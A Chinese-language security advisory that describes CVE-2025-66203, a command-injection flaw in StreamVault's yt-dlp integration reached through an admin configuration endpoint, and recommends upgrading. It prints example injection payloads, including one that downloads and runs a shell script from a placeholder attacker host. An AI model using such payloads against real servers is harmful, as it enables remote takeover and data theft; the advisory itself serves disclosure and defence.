CVE-2025-66203CVE-2025-66203是StreamVault视频下载集成解决方案中的一个严重远程代码执行漏洞。StreamVault是一款用于视频下载的应用系统,提供与yt-dlp的集成功能。在251126之前的版本中,该应用存在严重的安全缺陷,允许攻击者通过管理接口执行任意系统命令。漏洞的根本原因在于应用程序对yt-dlp参数的验证机制不完善,攻击者可以通过精心构造的恶意参数注入系统命令。由于该漏洞的CVSS评分高达9.9,属于严重级别,对系统的机密性、完整性和可用性都造成了极高的风险。未经身份验证的攻击者可以利用此漏洞完全控制受影响的服务器,窃取敏感数据、植入后门或进行其他恶意活动。该漏洞已被官方确认并在新版本中修复,建议所有用户立即升级到251126或更高版本。
StreamVault应用中的远程代码执行漏洞主要源于对yt-dlp命令行参数的不当处理。应用程序提供了/admin/api/saveConfig管理端点,允许管理员配置yt-dlp的执行参数。问题在于这些参数在接收时缺乏充分的输入验证和清理机制。恶意构造的参数会被存储到全局配置中,随后在YtDlpUtil.java文件构建yt-dlp命令行时被直接使用。攻击者可以利用这一点,通过注入分号、管道符或反引号等shell特殊字符,在yt-dlp命令执行时插入任意系统命令。例如,攻击者可以在yt-dlp参数中插入'$(whoami)'或';curl http://attacker.com/shell.sh|bash'等payload,当yt-dlp执行时,这些恶意命令将被shell解释执行。由于yt-dlp通常以高权限运行,攻击者可以获得服务器的最高控制权限。整个攻击过程不需要任何用户交互,且可以通过网络远程实施。